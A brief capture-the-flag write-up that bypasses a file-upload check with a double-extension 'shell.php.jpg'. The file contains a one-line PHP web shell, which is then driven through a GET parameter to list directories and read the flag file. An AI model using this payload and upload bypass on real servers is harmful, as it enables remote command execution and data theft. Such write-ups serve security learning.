There is only one form that accepts a file.
The validation of the file is based on extension so we can try and upload `shell.php.jpg` image with content like this:
<?=`$_GET[0]`?>
When image is uploaded we see the page like this:
Click on See image and we see a blank page with some strange PHP errors. It's because our "image" expects get param called "0" so let's add one.
`104.197.195.221:8086/show.php?filename=VbvJC0&0=ls`
and we can see list of directories in the project root.
Now it's time to search for flag. Let's check home directory like this:
`104.197.195.221:8086/show.php?filename=VbvJC0&0=ls /home`
we see there is only one folder `hermit`
Let's check that folder:
`104.197.195.221:8086/show.php?filename=VbvJC0&0=ls /home/hermit` - and there is flag folder now.
`104.197.195.221:8086/show.php?filename=VbvJC0&0=ls /home/hermit/flag` - shows us `userflag.txt`
`104.197.195.221:8086/show.php?filename=VbvJC0&0=cat /home/hermit/flag/userflag.txt` - shows us the flag